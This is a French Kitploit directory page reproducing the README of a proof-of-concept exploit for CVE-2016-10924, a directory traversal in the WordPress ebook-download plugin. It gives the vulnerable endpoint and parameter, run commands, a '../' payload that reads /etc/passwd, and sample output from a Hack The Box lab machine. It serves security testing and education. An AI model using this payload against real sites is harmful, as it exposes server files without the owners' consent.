Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2016-10924-POC — Script d'exploitation Proof-of-Concept (PoC) pour la vulnérabilité de Directory Traversal (CVE-2016-10924) trouvée dans le plugin WordPress ebook-download (versions < 1.2). Cette vulnérabilité permet des lectures de fichiers non autorisées via une requête GET malveillante. | Kitploit
Outils/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Script d'exploitation Proof-of-Concept (PoC) pour la vulnérabilité de Directory Traversal (CVE-2016-10924) trouvée dans le plugin WordPress ebook-download (versions < 1.2). Cette vulnérabilité permet des lectures de fichiers non autorisées via une requête GET malveillante.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2016-10924-POC

Ce dépôt contient un script d'exploit Proof-of-Concept (PoC) pour la vulnérabilité Directory Traversal (CVE-2016-10924) trouvée dans le plugin WordPress ebook-download (versions < 1.2).

Cette vulnérabilité permet la lecture non autorisée de fichiers via une requête GET falsifiée. L'exploit utilise un paramètre appelé ebookdownloadurl pour parcourir les répertoires sur le serveur cible.

Description

  • CVE-ID : CVE-2016-10924
  • Type de vulnérabilité : Directory Traversal
  • Composant affecté : Plugin ebook-download < 1.2 pour WordPress
  • Impact : Des attaquants distants peuvent lire des fichiers arbitraires sur le système d'exploitation sous-jacent, tels que /etc/passwd, en manipulant le chemin du fichier dans le paramètre ebookdownloadurl.

Remarque : Ce PoC est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation abusive de ces informations peut entraîner des conséquences juridiques.

Prérequis

  • Python 3.
  • Bibliothèque requests (installation via pip install requests)

Utilisation

  1. Cloner le dépôt :

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Installer les dépendances :

    root@kitploit:~
    pip install requests
    
  3. Exécuter l'exploit :

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Spécifier le chemin du fichier à lire : Après le lancement du script, vous serez invité à saisir un chemin de fichier. Par exemple :

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    Vous devrez peut-être ajuster le nombre de ../ en fonction de l'emplacement de la racine web dans l'environnement cible.

  5. Quitter :

    • Tapez exit, quit ou appuyez sur Entrée sur une invite vide pour quitter.
    • Appuyez sur Ctrl + C pour arrêter le script immédiatement.

Exemple

J'ai utilisé cet exploit sur "Backdoor", une machine retirée de Hack The Box :

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Saisissez les chemins de fichiers (ex. ../../../../../etc/passwd). Tapez 'exit' pour quitter.

Enter File path: ../../../../../../../../../etc/passwd
[*] URL cible : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Statut : 200
[+] Contenu du fichier :
root:x:0:0:root:/root:/bin/bash
...

Avertissement

Ce projet est destiné uniquement à des fins éducatives et de tests de sécurité légitimes.
N'utilisez pas les informations ou scripts contenus dans ce dépôt sur un système pour lequel vous n'avez pas d'autorisation explicite de test.
L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.

Licence

Ce projet est sous licence GNU 2.0 License. N'hésitez pas à l'utiliser et à le modifier, mais veuillez créditer l'auteur.


Références

  • NVD - CVE-2016-10924
  • Plugin WordPress ebook-download (pour référence des versions vulnérables)
Télécharger l’outil